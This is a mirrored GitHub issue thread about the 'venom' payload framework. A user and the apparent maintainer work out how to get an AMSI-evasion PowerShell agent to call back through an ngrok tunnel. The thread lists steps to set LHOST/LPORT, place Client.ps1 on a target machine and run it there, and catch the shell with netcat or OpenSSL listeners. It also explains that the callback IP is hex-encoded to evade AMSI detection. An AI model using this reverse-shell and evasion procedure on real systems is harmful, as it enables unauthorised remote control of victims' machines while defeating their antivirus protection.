Giter VIP home page Giter VIP logo

Comments (7)

r00t-3xp10it avatar r00t-3xp10it commented on July 17, 2024

see this: https://www.youtube.com/watch?v=fPF-slJLOlk&t=77s

from venom.

ricko2991 avatar ricko2991 commented on July 17, 2024

Hi, @r00t-3xp10it I have no problem in 1-7 payload categorie payloads when port forwading.
But I have a problem with Amsi evasion, I can't do port forwarding with it

from venom.

ricko2991 avatar ricko2991 commented on July 17, 2024

have you tried it and succeeded? Somehow i failed...
can you show host and the port you are using on the payload and also the listeners you used.


Hi, i try this:
2.tcp.ngrok.io:14598 --> localhost:1111

Payload options(ngrok)
LPORT : 14598
LHOST : 13.59.15.185 or LHOST : 2.tcp.ngrok.io

Listen
1º nc -lvp 0.0.0.0 14598 ==> invalid local port 0.0.0.0
2º nc -nlvp 1111 ==> Not connected / nc -lvp 1111 ==> not connected
3º nc -nlvp 14598 ==> not connected
4º nc -s 127.0.0.1 -nlvp 14598 ==> not connected
5º nc -s 127.0.0.1 -nlvp 1111 ==> not connected

from venom.

r00t-3xp10it avatar r00t-3xp10it commented on July 17, 2024

ok lets try this step by step ...
Check this video for referencie: https://www.youtube.com/watch?v=8YswLITdE7g


1º - ./ngrok tcp 14598
2º - chose venom - amsi evasion agent nº 2
3º - LHOST == 2.tcp.ngrok.io (ngrok)
4º - LPORT == 14598 (ngrok)
5º - goto /var/www/html and port the Agent (Client.ps1) to target machine (manually)
6º - start venom listenner (OpenSSL)
7º - On target machine execute the Client.ps1


Final notes:

Amsi evasion agents require the Apache2 webserver to deliver files to target host ...
so venom users need to port forward the Client.ps1 connection AND the apache2 webserver ..
"But In this exercise we are NOT going to port forward the apache2, just to test if the client connects back to the listenner"..
OpenSSL agents require openssl s_server -quiet -key key.pem -cert cert.pem -port 14598 <-openssl listenner not Netcat

from venom.

ricko2991 avatar ricko2991 commented on July 17, 2024

Thank you, now it's working.
And also for example I am using agent no.3 on amsi and it is covered by "hex obfuscation" how do I decode a script covered by hex?

from venom.

r00t-3xp10it avatar r00t-3xp10it commented on July 17, 2024

the only thing encoded (hex) in agent nº 3 its the ip address ...
This is one attempt to hidde the ip address 'string' from amsi string detection inside Client.ps1 ...
hex


how to decode hex

from venom.

ricko2991 avatar ricko2991 commented on July 17, 2024

Thank you 👍

from venom.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.